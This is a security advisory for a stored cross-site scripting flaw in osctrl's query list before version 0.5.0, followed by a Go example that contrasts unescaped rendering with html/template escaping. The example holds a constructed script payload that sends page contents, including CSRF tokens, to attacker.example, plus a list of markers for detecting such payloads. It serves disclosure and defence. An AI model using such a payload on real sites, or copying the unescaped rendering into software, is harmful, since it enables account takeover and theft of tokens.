osctrl Stored Cross-Site Scripting Vulnerability in On-Demand Query List
Vulnerability
A stored cross-site scripting (XSS) vulnerability has been identified in osctrl, an osquery management solution, in versions prior to 0.5.0. It affects the on-demand query list in 'osctrl-admin': a user holding only query-level permissions can submit a query whose text contains arbitrary HTML and JavaScript via the query parameter. The payload is stored with the query and rendered unescaped, so it executes in the browser of every user who views the query list page, administrators included. Because the script runs in the victim's origin, it can read the CSRF token from the page and issue authenticated requests, allowing the attacker to escalate privileges and perform actions as the logged-in user.
Impact
Exploitation allows for the execution of arbitrary JavaScript in the browsers of users viewing the query list, with the potential for full platform compromise if an administrator is affected.
Remediation
The vulnerability is fixed in osctrl version 0.5.0. Users should upgrade immediately. Until the upgrade is applied, restrict query-level permissions to trusted users, monitor the stored query list for HTML or script content, and review osctrl user accounts for administrators that were not provisioned deliberately.
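The following is an added illustration of the flaw class described above and of the "monitor the query list" workaround; it is not osctrl's code and does not reproduce the actual vulnerable template. osctrl is written in Go, so the example shows, in Go, a query-list row rendered by plain string formatting (the stored input lands in the DOM verbatim) beside the same row rendered through html/template, which escapes the value for its HTML context. The Query struct, the attacker hostname and the heuristic marker list are constructed for the example.

```go
package main

import (
	"bytes"
	"fmt"
	"html/template"
	"strings"
)

// Query is one stored on-demand query as it might later be listed.
// The field names are illustrative, not osctrl's data model.
type Query struct {
	Name  string
	Query string
}

// Constructed payload: valid SQL followed by a script that ships the page
// body (which would include any CSRF token) to a placeholder attacker host.
const attackerQuery = `SELECT * FROM osquery_info; <script>fetch("https://attacker.example/c?d="+encodeURIComponent(document.body.innerHTML))</script>`

// renderRowUnsafe builds the row with fmt.Sprintf. The stored query string is
// emitted verbatim, so its <script> element becomes part of the DOM and runs
// for every viewer of the list: a stored XSS.
func renderRowUnsafe(q Query) string {
	return fmt.Sprintf("<tr><td>%s</td><td>%s</td></tr>", q.Name, q.Query)
}

var rowTmpl = template.Must(template.New("row").Parse(
	"<tr><td>{{.Name}}</td><td>{{.Query}}</td></tr>"))

// renderRowSafe renders the same row through html/template, which applies
// context-aware escaping, so '<' becomes '&lt;' and the script never parses
// as markup.
func renderRowSafe(q Query) (string, error) {
	var buf bytes.Buffer
	if err := rowTmpl.Execute(&buf, q); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// containsActiveHTML is a crude triage heuristic for the workaround of
// monitoring stored queries for suspicious payloads. Legitimate osquery SQL
// has no reason to contain these markers. It is a detection aid, not a
// substitute for output escaping, and the marker list is illustrative.
func containsActiveHTML(sql string) bool {
	lower := strings.ToLower(sql)
	for _, marker := range []string{"<script", "onerror=", "onload=", "javascript:", "<img", "<svg", "<iframe"} {
		if strings.Contains(lower, marker) {
			return true
		}
	}
	return false
}

func main() {
	q := Query{Name: "inventory", Query: attackerQuery}
	fmt.Println("unsafe:", renderRowUnsafe(q))
	safe, err := renderRowSafe(q)
	if err != nil {
		panic(err)
	}
	fmt.Println("safe:  ", safe)
	fmt.Println("flagged:", containsActiveHTML(q.Query))
}
```

Running it prints the unsafe row with a live `<script>` element and the safe row with `&lt;script&gt;`, and flags the stored query. The heuristic is only useful for reviewing what is already stored in a pre-0.5.0 deployment; the durable fix is escaping at render time, which is what upgrading delivers.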
